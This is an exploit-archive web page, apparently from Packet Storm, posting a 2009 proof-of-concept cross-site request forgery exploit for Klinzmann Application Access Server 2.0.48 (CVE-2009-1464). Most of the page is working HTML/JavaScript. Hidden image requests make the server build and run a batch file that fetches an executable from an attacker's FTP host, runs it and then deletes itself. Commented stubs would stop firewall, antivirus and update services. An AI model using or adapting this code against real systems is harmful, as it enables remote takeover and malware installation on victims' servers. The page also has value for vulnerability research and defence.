exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Klinzmann A-A-S 2.0.48 XSRF Exploit

Klinzmann A-A-S 2.0.48 XSRF Exploit
Posted May 13, 2009
Authored by Felipe Daragon | Site syhunt.com

Klinzmann Application Access Server version 2.0.48 cross site request forgery exploit.

tags | exploit, csrf
advisories | CVE-2009-1464
SHA-256 | 8fbdf9086123ab178a93c6aa387ee37b227bad398eb09b10822fe24d631ab585

Klinzmann A-A-S 2.0.48 XSRF Exploit

Change Mirror Download
<html>
<body>

<!--
****************************************************************
AASHack 1.0 (By Felipe M. Aragon)
Affected Versions: AAS 2.0.48 and possibly older versions

This is an exploit demonstration code for the A-A-S (Application
Access Server) index.aas job parameter XSRF vulnerability
(CVE-2009-1464)

This script has been successfully tested on IE 7.0 and Firefox
3.08. Should work on any browser that has javascript enabled

Vulnerability found by Syhunt (http://www.syhunt.com)

This script should be used only by system administrators (or
other people in charge). Read the text below before making any
use of this script.

(c) 2009 Syhunt Cyber Security Company. All rights reserved.

This script is provided 'as-is', without any expressed or implied
warranty. In no event will the author be held liable for
any damages arising from the use of this script.
Permission is granted to anyone to use this script, and to alter
it and redistribute it freely, subject to the following
restrictions:

1. The origin of this script must not be misrepresented, you
must not claim that you wrote the original code.
2. Altered source versions must be plainly marked as such, and
must not be misrepresented as being the original script.
3. This notice may not be removed or altered from any source
distribution.

If you have any questions concerning this license, please email
contact _at_ syhunt _dot_ com
****************************************************************
-->

<script>
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

var dd=1000; // default delay time (ms)
var aas_url='http://[host]:6262'; // target AAS host
var ftp_host='x.x.x.x'; // attacker ftp host
var ftp_user='anonymous';
var ftp_pass='123456';
var ftp_commands_file='aashack.ftp';
var batch_file='aashack.bat';
var attacker_file='file.exe'; // file to upload

function delay(ms) {
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < ms);
}

function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');
}

// Main Functions
function Run(action,dms) { writeimg('command',action,''); delay(dms); }
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }

function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus");
//StopSvc("wuauserv"); // Automatic Updates
}

function KillUndesiredProcesses() {
//KillProcess('firewall.exe');
}

AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd('binary');
AddFTPCmd('get '+attacker_file);
AddFTPCmd('close');
AddFTPCmd('bye');
AddBatchLine('@echo off');
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);
AddBatchLine('start '+attacker_file);
AddBatchLine('del '+ftp_commands_file);
AddBatchLine('del %0'); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);
</script>

</body>
</html>


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close